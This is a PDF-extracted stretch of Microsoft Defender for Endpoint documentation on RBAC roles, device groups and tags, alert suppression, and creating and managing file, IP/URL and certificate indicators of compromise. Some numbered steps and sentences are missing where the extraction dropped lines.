$UserId = (Get-MgUser -UserId "reader@Contoso.onmicrosoft.com").Id
$DirObject = @{
"@odata.id" =
"https://graph.microsoft.com/v1.0/directoryObjects/$UserId"
}
New-MgDirectoryRoleMemberByRef -DirectoryRoleId $Role.Id -BodyParameter

$DirObject
For more information, see Add or remove group members using Microsoft Entra ID.
Assign user access using the Azure portal

For more information, see Assign administrator and non-administrator roles to users
with Microsoft Entra ID.
Related topic
Manage portal access using RBAC
 Tip
Feedback

Assign user access
Article • 10/20/2023
Applies to:
Microsoft Entra ID
Office 365

access to device groups. For more information on RBAC, see Manage portal access
using role-based access control.
７ Note
If you have already assigned basic permissions, you may switch to RBAC anytime.
Consider the following before making the switch:
Users with full access (users that are assigned the Global Administrator or
Security Administrator directory role in Microsoft Entra ID), are automatically
assigned the default Defender for Endpoint administrator role, which also has
full access. Additional Microsoft Entra user groups can be assigned to the
Defender for Endpoint administrator role after switching to RBAC. Only users
assigned to the Defender for Endpoint administrator role can manage
permissions using RBAC.
Users that have read-only access (Security Readers) will lose access to the
portal until they are assigned a role. Note that only Microsoft Entra user
groups can be assigned a role under RBAC.
After switching to RBAC, you will not be able to switch back to using basic
permissions management.
Related topics
Use basic permissions to access the portal
Manage portal access using RBAC
 Tip
Feedback

Create and manage roles for role-based
access control
Article • 11/15/2023
Applies to:

） Important

Create roles and assign the role to a Microsoft

Entra group
The following steps guide you on how to create roles in Microsoft Defender XDR. It
assumes that you have already created Microsoft Entra user groups.
1. Log in to Microsoft Defender XDR using account with a Security administrator or

Global administrator role assigned.
2. In the navigation pane, select Settings > Endpoints > Roles (under Permissions).
3. Select Add item.
4. Enter the role name, description, and permissions you'd like to assign to the role.
5. Select Next to assign the role to a Microsoft Entra Security group.
6. Use the filter to select the Microsoft Entra group that you'd like to add to this role
to.
7. Save and close.

8. Apply the configuration settings.
） Important
After creating roles, you'll need to create a device group and provide access to the
device group by assigning it to a role that you just created.
７ Note
Permission options
View data
Security operations - View all security operations data in the portal
Defender Vulnerability Management - View Defender Vulnerability
Management data in the portal
Active remediation actions

Security operations - Take response actions, approve or dismiss pending
remediation actions, manage allowed/blocked lists for automation and
indicators
Defender Vulnerability Management - Exception handling - Create new
exceptions and manage active exceptions
Defender Vulnerability Management - Remediation handling - Submit new
remediation requests, create tickets, and manage existing remediation activities
Defender Vulnerability Management - Application handling - Apply
immediate mitigation actions by blocking vulnerable applications, as part of the
remediation activity and manage the blocked apps and perform unblock actions
Security baselines
Defender Vulnerability Management – Manage security baselines assessment
profiles - Create and manage profiles so you can assess if your devices comply
to security industry baselines.
Alerts investigation - Manage alerts, initiate automated investigations, run scans,

collect investigation packages, manage device tags, and download only portable
executable (PE) files
Manage portal system settings - Configure storage settings, SIEM and threat intel
API settings (applies globally), advanced settings, automated file uploads, roles and
device groups
７ Note
This setting is only available in the Microsoft Defender for Endpoint

administrator (default) role.
Manage security settings in Security Center - Configure alert suppression

settings, manage folder exclusions for automation, onboard and offboard devices,
manage email notifications, manage evaluation lab, and manage allowed/blocked
lists for indicators
Live response capabilities

Basic commands:
Start a live-response session
Perform read-only live-response commands on remote device (excluding file
copy and execution)
Download a file from the remote device via live response
Advanced commands:
Download PE and non-PE files from the file page
Upload a file to the remote device
View a script from the files library
Execute a script on the remote device from the files library
For more information on the available commands, see Investigate devices using Live
response.
Edit roles
1. Log in to Microsoft Defender XDR using account with Security administrator or
3. Select the role you'd like to edit.
4. Click Edit.
5. Modify the details or the groups that are assigned to the role.
6. Click Save and close.

Delete roles
1. Log in to Microsoft Defender XDR using account with Security administrator or
3. Select the role you'd like to delete.
4. Click the drop-down button and select Delete role.
Related topic
User basic permissions to access the portal
Create and manage device groups
 Tip
Feedback

Create and manage device groups
Article • 10/20/2023
Applies to:
Microsoft Entra ID
Office 365
７ Note
In an enterprise scenario, security operation teams are typically assigned a set of

devices. These devices are grouped together based on a set of attributes such as their
domains, computer names, or designated tags.
In Microsoft Defender for Endpoint, you can create device groups and use them to:
Limit access to related alerts and data to specific Microsoft Entra user groups with
assigned RBAC roles
Configure different auto-remediation settings for different sets of devices
Assign specific remediation levels to apply during automated investigations
In an investigation, filter the Devices list to specific device groups by using the
Group filter.
You can create device groups in the context of role-based access (RBAC) to control who
can take specific action or see information by assigning the device group(s) to a user
group. For more information, see Manage portal access using role-based access control.
 Tip
For a comprehensive look into RBAC application, read: Is your SOC running flat
with RBAC .
As part of the process of creating a device group, you'll:

Set the automated remediation level for that group. For more information on
remediation levels, see Use Automated investigation to investigate and remediate
threats.
Specify the matching rule that determines which device group belongs to the
group based on the device name, domain, tags, and OS platform. If a device is also
matched to other groups, it's added only to the highest ranked device group.
Select the Microsoft Entra user group that should have access to the device group.
Rank the device group relative to other groups after it's created.
７ Note
A device group is accessible to all users if you don't assign any Microsoft Entra
groups to it.
Create a device group

1. In the navigation pane, select Settings > Endpoints > Permissions > Device
groups.
2. Click Add device group.
3. Enter the group name and automation settings and specify the matching rule that
determines which devices belong to the group. See How the automated
investigation starts.
 Tip
If you want to use tagging for grouping devices, see Create and manage
device tags.
4. Preview several devices that will be matched by this rule. If you're satisfied with the
rule, click the User access tab.
5. Assign the user groups that can access the device group you created.
７ Note
You can only grant access to Microsoft Entra user groups that have been
assigned to RBAC roles.
6. Click Close. The configuration changes are applied.
７ Note
Device Groups in Defender for Business are managed differently. For more
information, see Device groups in Microsoft Defender for Business.
Manage device groups

You can promote or demote the rank of a device group so that it's given higher or lower
priority during matching. A device group with a rank of 1 is the highest ranked group.
When a device is matched to more than one group, it's added only to the highest
ranked group. You can also edit and delete groups.
２ Warning
Deleting a device group may affect email notification rules. If a device group is
configured under an email notification rule, it will be removed from that rule. If the
device group is the only group configured for an email notification, that email
notification rule will be deleted along with the device group.
By default, device groups are accessible to all users with portal access. You can change
the default behavior by assigning Microsoft Entra user groups to the device group.
Devices that aren't matched to any groups are added to Ungrouped devices (default)
group. You cannot change the rank of this group or delete it. However, you can change
the remediation level of this group, and define the Microsoft Entra user groups that can
access this group.
７ Note
Applying changes to device group configuration may take up to several minutes.
Add device group definitions

Device group definitions can also include multiple values for each condition. You can set
multiple tags, device names, and domains to the definition of a single device group.
1. Create a new device group, then select Devices tab.

2. Add the first value for one of the conditions.
3. Select + to add more rows of the same property type.
 Tip
Use the 'OR' operator between rows of the same condition type, which allows
multiple values per property. You can add up to 10 rows (values) for each property
type - tag, device name, domain.
For more information on linking to device groups definitions, see Device groups -
Microsoft 365 security .
Related topics
Manage portal access using role-based based access control
Create and manage device tags
Get list of tenant device groups using Graph API
 Tip
Feedback

Article • 11/15/2023
７ Note
Applies to:

Add tags on devices to create a logical group affiliation. Device tags support proper
mapping of the network, enabling you to attach different tags to capture context and to
enable dynamic list creation as part of an incident. Tags can be used as a filter in the
Device inventory view, or to group devices. For more information on device grouping,
see Create and manage device groups.
７ Note
You can add tags on devices using the following ways:
Using the portal

Setting a registry key value
７ Note
There may be some latency between the time a tag is added to a device and its
availability in the devices list and device page.
To add device tags using API, see Add or remove device tags API.
Add and manage device tags using the portal

1. Select the device that you want to manage tags on. You can select or search for a
device from any of the following views:
Alerts queue - Select the device name beside the device icon from the alerts
queue.
Devices inventory - Select the device name from the list of devices.
Search box - Select Device from the drop-down menu and enter the device
name.
You can also get to the alert page through the file and IP views.
2. Select Manage tags from the row of Response actions.
3. Type to find or create tags
Tags are added to the device view and will also be reflected on the Devices inventory
view. You can then use the Tags filter to see the relevant list of devices.
７ Note
Filtering might not work on tag names that contain parenthesis or commas.
When you create a new tag, a list of existing tags are displayed. The list only shows
tags created through the portal. Existing tags created from client devices will not be
displayed.
You can also delete tags from this view.
Add device tags by setting a registry key value
７ Note
Applicable only on the following devices:
Windows 11
Windows 10, version 1709 or later
Windows Server 2016
Windows 8.1
Windows 7 SP1
７ Note
The maximum number of characters that can be set in a tag is 200.
Devices with similar tags can be handy when you need to apply contextual action on a
specific list of devices.
Use the following registry key entry to add a tag on a device:
Registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced

Threat Protection\DeviceTagging\
Registry key value (REG_SZ): Group

Registry key data: Name of the tag you want to set
７ Note
The device tag is part of the device information report that's generated once a day.
As an alternative, you may choose to restart the endpoint that would transfer a new
device information report.
If you need to remove a tag that was added using the above Registry key, clear the
contents of the Registry key data instead of removing the 'Group' key.
Add device tags by creating a custom profile in

Microsoft Intune
You can use Microsoft Intune to define and apply device tags. You can perform this task
by creating a device configuration profile using custom settings in Intune. For more
information, see Create a profile with custom settings in Intune.
In the Create the profile procedure, for step 3, choose either macOS or Windows
10 and later, depending on the devices you want to tag.
For Windows 10 or later, in the OMA-IRU settings section, for Data type, choose
String. For OMA-URI, type (or paste)
./Device/Vendor/MSFT/WindowsAdvancedThreatProtection/DeviceTagging/Group .
For macOS, follow the guidance in Use custom settings for macOS devices in
Microsoft Intune.
 Tip
Feedback

Article • 11/15/2023
Applies to:

There might be scenarios where you need to suppress alerts from appearing in the
portal. You can create suppression rules for specific alerts that are known to be
innocuous such as known tools or processes in your organization. For more information
on how to suppress alerts, see Suppress alerts.
You can view a list of all the suppression rules and manage them in one place. You can
also turn an alert suppression rule on or off.

2. In the navigation pane, select Settings > Endpoints > Rules > Alert suppression.
The list of suppression rules that users in your organization have created is
displayed.
3. Select a rule by clicking on the check-box beside the rule name.
4. Click Turn rule on, Edit rule, or Delete rule. When making changes to a rule, you
can choose to release alerts that it has already suppressed, regardless whether or
not these alerts match the new criteria.
View details of a suppression rule

The list of suppression rules that users in your organization have created is
displayed.
2. Click on a rule name. Details of the rule is displayed. You'll see the rule details such
as status, scope, action, number of matching alerts, created by, and date when the
rule was created. You can also view associated alerts and the rule conditions.
Related topics
Manage alerts
 Tip
Feedback

Create indicators
Article • 01/19/2024
Applies to:

 Tip
Indicator of compromise (IoC) overview

An Indicator of compromise (IoC) is a forensic artifact, observed on the network or host.
An IoC indicates - with high confidence - a computer or network intrusion has occurred.
IoCs are observable, which links them directly to measurable events. Some IoC examples
include:
hashes of known malware

signatures of malicious network traffic
URLs or domains that are known malware distributors
To halt other compromise or prevent breaches of known IoCs, successful IoC tools
should be able to detect all malicious data that is enumerated by the tool's rule set. IoC
matching is an essential feature in every endpoint protection solution. This capability
gives SecOps the ability to set a list of indicators for detection and for blocking
(prevention and response).
Organizations can create indicators that define the detection, prevention, and exclusion
of IoC entities. You can define the action to be taken as well as the duration for when to
apply the action, and the scope of the device group to apply it to.
This video shows a walkthrough of creating and adding indicators:

https://www.microsoft.com/en-us/videoplayer/embed/RE4qLVw?postJsllMsg=true
About Microsoft indicators

As a general rule, you should only create indicators for known bad IoCs, or for any files /
websites that should be explicitly allowed in your organization. For more information on
the types of sites that Defender for Endpoint can block by default, see Microsoft
Defender SmartScreen overview.
False Positive (FP) refers to a SmartScreen false positive, such that it's considered to be
malware or phish, but actually isn't a threat, so you want to create an allow policy for it.
You can also help drive improvements to Microsoft's security intelligence by submitting
false positives, and suspicious or known-bad IoCs for analysis. If a warning or block is
incorrectly shown for a file or application, or if you suspect an undetected file is
malware, you can submit a file to Microsoft for review. For more information, see Submit
files for analysis .
IP/URL indicators
You can use IP/URL indicators to unblock users from a SmartScreen false positive (FP) or
to override a Web Content Filtering (WFC) block.
You can use URL and IP indicators to manage site access. You can create interim IP and
URL indicators to temporarily unblock users from a SmartScreen block. You might also
have indicators that you keep for a long period of time to selectively bypass web
content filtering blocks.
Consider the case where you have a web content filtering categorization for a particular
site that is correct. In this example, you have web content filtering set to block all social
media, which is correct for your overall organizational goals. However, the marketing
team has a real need to use a specific social media site for advertising and
announcements. In that case, you can unblock the specific social media site using IP or
URL indicators for the specific group (or groups) to use.
See Web protection and Web content filtering
IP/URL Indicators: Network protection and the

TCP three-way handshake
With network protection, the determination of whether to allow or block access to a site
is made after the completion of the three-way handshake via TCP/IP. Thus, when a site is
blocked by network protection, you might see an action type of ConnectionSuccess
under NetworkConnectionEvents in the Microsoft Defender portal, even though the site
was blocked. NetworkConnectionEvents are reported from the TCP layer, and not from
network protection. After the three-way handshake has completed, access to the site is
allowed or blocked by network protection.
Here's an example of how that works:
1. Suppose that a user attempts to access a website on their device. The site happens
to be hosted on a dangerous domain, and it should be blocked by network
protection.
2. The three-way handshake via TCP/IP commences. Before it completes, a

NetworkConnectionEvents action is logged, and its ActionType is listed as
ConnectionSuccess . However, as soon as the three-way handshake process
completes, network protection blocks access to the site. All of this happens quickly.
A similar process occurs with Microsoft Defender SmartScreen; it's when the three-
way handshake completes that a determination is made, and access to a site is
either blocked or allowed.
3. In the Microsoft Defender portal, an alert is listed in the alerts queue. Details of
that alert include both NetworkConnectionEvents and AlertEvents . You can see that
the site was blocked, even though you also have a NetworkConnectionEvents item
with the ActionType of ConnectionSuccess .
File hash indicators
In some cases, creating a new indicator for a newly identified file IoC - as an immediate
stop-gap measure - might be appropriate to block files or even applications. However,
using indicators to attempt to block an application might not provide the expected
results as applications are typically composed of many different files. The preferred
methods of blocking applications are to use Windows Defender Application Control
(WDAC) or AppLocker.
Because each version of an application has a different file hash, using indicators to block
hashes isn't recommended.
Windows Defender Application Control (WDAC)
Certificate indicators
In some cases, a specific certificate that's used to sign a file or application that your
organization is set to allow or block. Certificate indicators are supported in Defender for
Endpoint, if they use the .CER or .PEM file format. See Create indicators based on
certificates for more details.
IoC detection engines
Currently, the supported Microsoft sources for IoCs are:
Cloud detection engine of Defender for Endpoint

Automated investigation and remediation (AIR) engine in Microsoft Defender for
Endpoint
Endpoint prevention engine (Microsoft Defender Antivirus)
Cloud detection engine

The cloud detection engine of Defender for Endpoint regularly scans collected data and
tries to match the indicators you set. When there's a match, action is taken according to
the settings you specified for the IoC.
Endpoint prevention engine

The same list of indicators is honored by the prevention agent. Meaning, if Microsoft
Defender Antivirus is the primary antivirus configured, the matched indicators are
treated according to the settings. For example, if the action is "Alert and Block",
Microsoft Defender Antivirus prevents file executions (block and remediate) and a
corresponding alert appears. On the other hand, if the Action is set to "Allow", Microsoft
Defender Antivirus doesn't detect or block the file.

engine
The automated investigation and remediation behave similarly to the endpoint
prevention engine. If an indicator is set to "Allow", automated investigation and
remediation ignores a "bad" verdict for it. If set to "Block", automated investigation and
remediation treats it as "bad".
The EnableFileHashComputation setting computes the file hash for the cert and file IoC
during file scans. It supports IoC enforcement of hashes and certs belong to trusted
applications. It's concurrently enabled with the allow or block file setting.
EnableFileHashComputation is enabled manually through Group Policy, and is disabled
by default.
Enforcement types for Indicators

When your security team creates a new indicator (IoC), the following actions are
available:
Allow – the IoC is allowed to run on your devices.

Audit – an alert is triggered when the IoC runs.
Warn – the IoC prompts a warning that the user can bypass
Block execution - the IoC won't be allowed to run.
Block and remediate - the IoC won't be allowed to run and a remediation action
will be applied to the IoC.
７ Note
Using Warn mode will prompt your users with a warning if they open a risky app or
website. The prompt won't block them from allowing the application or website to
run, but you can provide a custom message and links to a company page that
describes appropriate usage of the app. Users can still bypass the warning and
continue to use the app if they need. For more information, see Govern apps
discovered by Microsoft Defender for Endpoint.
You can create an indicator for:
Files
IP addresses
URLs/domains
Certificates
The table below shows exactly which actions are available per indicator (IoC) type:
ﾉ Expand table
IoC type Available actions
Files Allow
Audit
Warn
Block execution
Block and remediate
IP addresses Allow
Audit
Warn
Block execution
URLs and domains Allow

Audit
IoC type Available actions
Warn
Block execution
Certificates Allow
Block and remediate
The functionality of pre-existing IoCs won't change. However, the indicators were
renamed to match the current supported response actions:
The "alert only" response action was renamed to "audit" with the generated alert
setting enabled.
The "alert and block" response was renamed to "block and remediate" with the
optional generate alert setting.
The IoC API schema and the threat IDs in advance hunting are updated to align with the
renaming of the IoC response actions. The API scheme changes apply to all IoC Types.
７ Note
There is a limit of 15,000 indicators per tenant. File and certificate indicators do not
block exclusions defined for Microsoft Defender Antivirus. Indicators are not
supported in Microsoft Defender Antivirus when it is in passive mode.
The format for importing new indicators (IoCs) has changed according to the new
updated actions and alerts settings. We recommend downloading the new CSV
format that can be found at the bottom of the import panel.

Customers might experience issues with alerts for Indicators of Compromise. The
following scenarios are situations where alerts aren't created or are created with
inaccurate information. Each issue is investigated by our engineering team.
Block indicators – Generic alerts with informational severity only will be fired.
Custom alerts (that is, custom title and severity) aren't fired in these cases.
Warn indicators – Generic alerts and custom alerts are possible in this scenario,
however, the results aren't deterministic due to an issue with the alert detection
logic. In some cases, customers might see a generic alert, whereas a custom alert
might show in other cases.
Allow – No alerts are generated (by design).
Audit - Alerts are generated based on the severity provided by the customer.
In some cases, alerts coming from EDR detections might take precedence over
alerts stemming from antivirus blocks, in which case an information alert will be
generated.
Microsoft Store apps cannot be blocked by Defender because they're signed by

Microsoft.
Related articles
Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus
Create contextual IoC
Use the Microsoft Defender for Endpoint indicators API
Use partner integrated solutions
 Tip
Feedback

Create indicators for files
Article • 03/08/2023
Applies to:

 Tip
Prevent further propagation of an attack in your organization by banning potentially

malicious files or suspected malware. If you know a potentially malicious portable
executable (PE) file, you can block it. This operation will prevent it from being read,
written, or executed on devices in your organization.
There are three ways you can create indicators for files:
By creating an indicator through the settings page

By creating a contextual indicator using the add indicator button from the file
details page
By creating an indicator through the Indicator API
Before you begin

It's important to understand the following prerequisites prior to creating indicators for
files:
This feature is available if your organization uses Microsoft Defender Antivirus (in
active mode) and Cloud-based protection is enabled. For more information, see
Manage cloud-based protection.
The Antimalware client version must be 4.18.1901.x or later. See Monthly platform
and engine versions
Supported on devices with Windows 10, version 1703 or later, Windows Server
2019, Windows Server 2016, Windows Server 2012 R2, and Windows Server 2022.
７ Note
Windows Server 2016 and Windows Server 2012 R2 will need to be

onboarded using the instructions in Onboard Windows servers for this
feature to work. Custom file indicators with the Allow, Block and Remediate
actions are now also available in the enhanced antimalware engine
capabilities for macOS and Linux .
To start blocking files, you first need to turn on the "block or allow" feature in
Settings.
This feature is designed to prevent suspected malware (or potentially malicious files)
from being downloaded from the web. It currently supports portable executable (PE)
files, including .exe and .dll files. The coverage will be extended over time.
） Important
In Defender for Endpoint Plan 1 and Defender for Business, you can create an
indicator to block or allow a file. In Defender for Business, your indicator is applied
across your environment and cannot be scoped to specific devices.
Create an indicator for files from the settings

page
1. In the navigation pane, select Settings > Endpoints > Indicators (under Rules).
2. Select the File hashes tab.
3. Select Add item.
4. Specify the following details:
Indicator - Specify the entity details and define the expiration of the indicator.
Action - Specify the action to be taken and provide a description.
Scope - Define the scope of the device group (scoping isn't available in
Defender for Business).
７ Note
Device Group creation is supported in both Defender for Endpoint Plan 1
and Plan 2
5. Review the details in the Summary tab, then select Save.
Create a contextual indicator from the file

details page
One of the options when taking response actions on a file is adding an indicator for the
file. When you add an indicator hash for a file, you can choose to raise an alert and
block the file whenever a device in your organization attempts to run it.
Files automatically blocked by an indicator won't show up in the file's Action center, but
the alerts will still be visible in the Alerts queue.
Public Preview: Alerting on file blocking actions
） Important
Information in this section (Public Preview for Automated investigation and

remediation engine) relates to prerelease product which might be substantially
modified before it's commercially released. Microsoft makes no warranties, express
or implied, with respect to the information provided here.
The current supported actions for file IOC are allow, audit and block, and remediate.
After choosing to block a file, you can choose whether triggering an alert is needed. In
this way, you'll be able to control the number of alerts getting to your security
operations teams and make sure only required alerts are raised.
In Microsoft Defender XDR, go to Settings > Endpoints > Indicators > Add New File
Hash.
Choose to Block and remediate the file.
Choose if to Generate an alert on the file block event and define the alerts settings:
The alert title

The alert severity
Category
Description
Recommended actions
） Important
Typically, file blocks are enforced and removed within a couple of minutes, but
can take upwards of 30 minutes.
If there are conflicting file IoC policies with the same enforcement type and
target, the policy of the more secure hash will be applied. An SHA-256 file
hash IoC policy will win over an SHA-1 file hash IoC policy, which will win over
an MD5 file hash IoC policy if the hash types define the same file. This is
always true regardless of the device group.
In all other cases, if conflicting file IoC policies with the same enforcement
target are applied to all devices and to the device's group, then for a device,
the policy in the device group will win.
If the EnableFileHashComputation group policy is disabled, the blocking
accuracy of the file IoC is reduced. However, enabling
EnableFileHashComputation may impact device performance. For example,
copying large files from a network share onto your local device, especially
over a VPN connection, might have an effect on device performance.
For more information about the EnableFileHashComputation group policy, see

Defender CSP.
For more information on configuring this feature on Defender for Endpoint on
Linux and macOS, see Configure file hash computation feature on Linux and
Configure file hash computation feature on macOS.
Public Preview: Advanced hunting capabilities
） Important
Information in this section (Public Preview for Automated investigation and

remediation engine) relates to prerelease product which may be substantially
You can query the response action activity in advance hunting. Below is a sample
advance hunting query:
Console
search in (DeviceFileEvents, DeviceProcessEvents, DeviceEvents,

DeviceRegistryEvents, DeviceNetworkEvents, DeviceImageLoadEvents,
DeviceLogonEvents)
Timestamp > ago(30d)
| where AdditionalFields contains "EUS:Win32/CustomEnterpriseBlock!cl"
For more information about advanced hunting, see Proactively hunt for threats with
advanced hunting.
Below are other thread names that can be used in the sample query from above:
Files:
EUS:Win32/CustomEnterpriseBlock!cl
EUS:Win32/CustomEnterpriseNoAlertBlock!cl
Certificates:
EUS:Win32/CustomCertEnterpriseBlock!cl
The response action activity can also be viewable in the device timeline.
Policy conflict handling

Cert and File IoC policy handling conflict will follow the below order:
If the file isn't allowed by Windows Defender Application Control and AppLocker
enforce mode policy/policies, then Block
Else if the file is allowed by the Microsoft Defender Antivirus exclusion, then Allow
Else if the file is blocked or warned by a block or warn file IoC, then Block/Warn
Else if the file is blocked by SmartScreen, then Block
Else if the file is allowed by an allow file IoC policy, then Allow
Else if the file is blocked by ASR rules, CFA, AV, then Block
Else Allow (passes Windows Defender Application Control & AppLocker policy, no
IoC rules apply to it)
７ Note
In situations when Microsoft Defender Antivirus is set to Block, but Defender for
Endpoint - Indicators - File hash or Certificate is set to Allow, the policy will default
to Allow.
If there are conflicting file IoC policies with the same enforcement type and target, the
policy of the more secure (meaning longer) hash will be applied. For example, an SHA-
256 file hash IoC policy will win over an MD5 file hash IoC policy if both hash types
define the same file.
２ Warning
Policy conflict handling for files and certs differ from policy conflict handling for
domains/URLs/IP addresses.
Microsoft Defender Vulnerability Management's block vulnerable application features

uses the file IoCs for enforcement and will follow the above conflict handling order.
Examples
ﾉ Expand table
Component Component File indicator Result
enforcement Action
Attack surface reduction file path Allow Block Block

exclusion
Attack surface reduction rule Block Allow Allow
Windows Defender Application Allow Block Allow

Control
Windows Defender Application Block Allow Block

Control
Microsoft Defender Antivirus exclusion Allow Block Allow
See also
Create indicators
Create indicators for IPs and URLs/domains
Create indicators based on certificates
Manage indicators
 Tip
Feedback

Create indicators for IPs and
URLs/domains
Article • 10/06/2023
Applies to:

 Tip
Overview
By creating indicators for IPs and URLs or domains, you can now allow or block IPs,
URLs, or domains based on your own threat intelligence. You can also warn users with a
prompt if they open a risky app. The prompt won't stop them from using the app but
you can provide a custom message and links to a company page that describes
appropriate usage of the app. Users can still bypass the warning and continue to use the
app if they need.
To block malicious IPs/URLs (as determined by Microsoft), Defender for Endpoint can
use:
Windows Defender SmartScreen for Microsoft browsers

Network Protection for non-Microsoft browsers, or calls made outside of a browser
The threat-intelligence data set to block malicious IPs/URLs is managed by Microsoft.
You can block malicious IPs/URLs through the settings page or by machine groups, if
you deem certain groups to be more or less at risk than others.
７ Note
Classless Inter-Domain Routing (CIDR) notation for IP addresses is not supported.

Before you begin
It's important to understand the following prerequisites prior to creating indicators for
IPS, URLs, or domains:
Network Protection requirements

URL/IP allow and block requires that the Microsoft Defender for Endpoint component
Network Protection is enabled in block mode. For more information on Network
Protection and configuration instructions, see Enable network protection.
Supported operating systems

Windows 11
Windows Server 2016
Windows Server 2019
Windows Server 2022
macOS
Linux
iOS
Android
Windows Server 2016 and Windows Server 2012 R2

requirements
Windows Server 2016 and Windows Server 2012 R2 must be onboarded using the
Microsoft Defender Antivirus version requirements

The Antimalware client version must be 4.18.1906.x or later.
Custom network indicators requirements

Ensure that Custom network indicators is enabled in Microsoft Defender XDR >
Settings > Advanced features. For more information, see Advanced features.
For support of indicators on iOS, see Microsoft Defender for Endpoint on iOS.
For support of indicators on Android, see Microsoft Defender for Endpoint on Android.
IoC indicator list limitations

Only external IPs can be added to the indicator list. Indicators can't be created for
internal IPs. For web protection scenarios, we recommend using the built-in capabilities
in Microsoft Edge. Microsoft Edge leverages Network Protection to inspect network
traffic and allows blocks for TCP, HTTP, and HTTPS (TLS).
Non Microsoft Edge and Internet Explorer processes

For processes other than Microsoft Edge and Internet Explorer, web protection scenarios
leverage Network Protection for inspection and enforcement:
IP is supported for all three protocols (TCP, HTTP, and HTTPS (TLS))
Only single IP addresses are supported (no CIDR blocks or IP ranges) in custom
indicators
Encrypted URLs (full path) can only be blocked on first party browsers (Internet
Explorer, Edge)
Encrypted URLs (FQDN only) can be blocked in third party browsers (that is, other
than Internet Explorer, Edge)
Full URL path blocks can be applied for unencrypted URLs
If there are conflicting URL indicator policies, the longer path is applied. For
example, the URL indicator policy https://support.microsoft.com/office takes
precedence over the URL indicator policy https://support.microsoft.com .
Network protection and the TCP three-way

handshake
under NetworkConnectionEvents in the Microsoft Defender portal, even though the site
was blocked. NetworkConnectionEvents are reported from the TCP layer, and not from
network protection. After the three-way handshake has completed, access to the site is
allowed or blocked by network protection.

protection.

NetworkConnectionEvents action is logged, and its ActionType is listed as
that alert include both NetworkConnectionEvents and AlertEvents . You can see that
the site was blocked, even though you also have a NetworkConnectionEvents item
with the ActionType of ConnectionSuccess .
Warn mode controls

When using warn mode, you can configure the following controls:
Bypass ability
Allow button in Edge
Allow button on toast (Non-Microsoft browsers)
Bypass duration parameter on the indicator
Bypass enforcement across Microsoft and Non-Microsoft browsers
Redirect URL
Redirect URL parameter on the indicator
Redirect URL in Edge
Redirect URL on toast (Non-Microsoft browsers)
For more information, see Govern apps discovered by Microsoft Defender for Endpoint.
IoC IP URL and domain policy conflict handling

order
Policy conflict handling for domains/URLs/IP addresses differ from policy conflict
handling for certs.
In the case where multiple different action types are set on the same indicator (for
example, block, warn, and allow, action types set for Microsoft.com), the order those
action types would take effect is:
1. Allow
2. Warn
3. Block
Allow overrides warn which overrides block: Allow > Warn > Block. Therefore, in the
above example, Microsoft.com would be allowed.
Defender for Cloud Apps Indicators

If your organization has enabled integration between Defender for Endpoint and
Defender for Cloud Apps, block indicators will be created in Defender for Endpoint for
all unsanctioned cloud applications. If an application is put in monitor mode, warn
indicators (bypassable block) will be created for the URLs associated with the
application. Allow indicators cannot be created for sanctioned applications at this time.
Indicators created by Defender for Cloud Apps follow the same policy conflict handling
described in the previous section.
Policy precedence
Microsoft Defender for Endpoint policy has precedence over Microsoft Defender
Antivirus policy. In situations when Defender for Endpoint is set to Allow, but Microsoft
Defender Antivirus is set to Block, the policy will default to Allow.
Precedence for multiple active policies

Applying multiple different web content filtering policies to the same device will result in
the more restrictive policy applying for each category. Consider the following scenario:
Policy 1 blocks categories 1 and 2 and audits the rest

Policy 2 blocks categories 3 and 4 and audits the rest
The result is that categories 1-4 are all blocked. This is illustrated in the following image.
Create an indicator for IPs, URLs, or domains
from the settings page
2. Select the IP addresses or URLs/Domains tab.
3. Select Add item.
Scope - Define the scope of the machine group.
5. Review the details in the Summary tab, then select Save.
７ Note
There may be up to 2 hours of latency between the time a policy is created and the
URL or IP being blocked on the device.
Related articles
Create indicators
Manage indicators
 Tip
Feedback

Article • 07/18/2023
Applies to:

You can create indicators for certificates. Some common use cases include:
Scenarios when you need to deploy blocking technologies, such as attack surface
reduction rules and controlled folder access but need to allow behaviors from
signed applications by adding the certificate in the allow list.
Blocking the use of a specific signed application across your organization. By
creating an indicator to block the certificate of the application, Windows Defender
AV will prevent file executions (block and remediate) and the Automated
Investigation and Remediation behave the same.
Before you begin

It's important to understand the following requirements prior to creating indicators for
certificates:
This feature is available if your organization uses Microsoft Defender Antivirus and
Cloud-based protection is enabled. For more information, see Manage cloud-
based protection.
Supported on machines on Windows 10, version 1703 or later, Windows Server

2019, Windows Server 2016, Windows Server 2012 R2, and Windows Server 2022.
７ Note

feature to work.
The virus and threat protection definitions must be up to date.
This feature currently supports entering .CER or .PEM file extensions.
） Important
A valid leaf certificate is a signing certificate that has a valid certification path
and must be chained to the Root Certificate Authority (CA) trusted by
Microsoft. Alternatively, a custom (self-signed) certificate can be used as long
as it's trusted by the client (Root CA certificate is installed under the Local
Machine 'Trusted Root Certification Authorities').
The children or parent of the allow/block certificate IOCs are not included in
the allow/block IoC functionality, only leaf certificates are supported.
Microsoft signed certificates cannot be blocked.
Create an indicator for certificates from the

settings page:
） Important
It can take up to 3 hours to create and remove a certificate IoC.
2. Select Add indicator.
Scope - Define the scope of the machine group.
4. Review the details in the Summary tab, then click Save.
Related articles
Create indicators
Manage indicators
 Tip
Feedback

Manage indicators
Article • 02/21/2024
Applies to:

2. Select the tab of the entity type you'd like to manage.
3. Update the details of the indicator and select Save or select the Delete button if
you'd like to remove the entity from the list.
Import a list of IoCs

You can also choose to upload a CSV file that defines the attributes of indicators, the
action to be taken, and other details.
Download the sample CSV to know the supported column attributes.
2. Select the tab of the entity type you'd like to import indicators for.
3. Select Import > Choose file.
4. Select Import. Repeat for all the files you'd like to import.
5. Select Done.
７ Note
Only 500 indicators can be uploaded for each batch.
Attempting to import indicators with specific categories requires the string to be

written in Pascal case convention and only accepts the category list available at the
portal.
The following table shows the supported parameters.
ﾉ Expand table
Parameter Type Description
indicatorType Enum Type of the indicator. Possible values are: FileSha1,

FileSha256, IpAddress, DomainName, and Url. Required
indicatorValue String Identity of the Indicator entity. Required
action Enum The action that is taken if the indicator is discovered in

the organization. Possible values are: Allowed, Audit,
BlockAndRemediate, Warn, and Block. Required
title String Indicator alert title. Required
description String Description of the indicator. Required
expirationTime DateTimeOffset The expiration time of the indicator in the following

format YYYY-MM-DDTHH:MM:SS.0Z. The indicator gets
deleted if the expiration time passes and whatever
happens at the expiration time occurs at the seconds
(SS) value. Optional
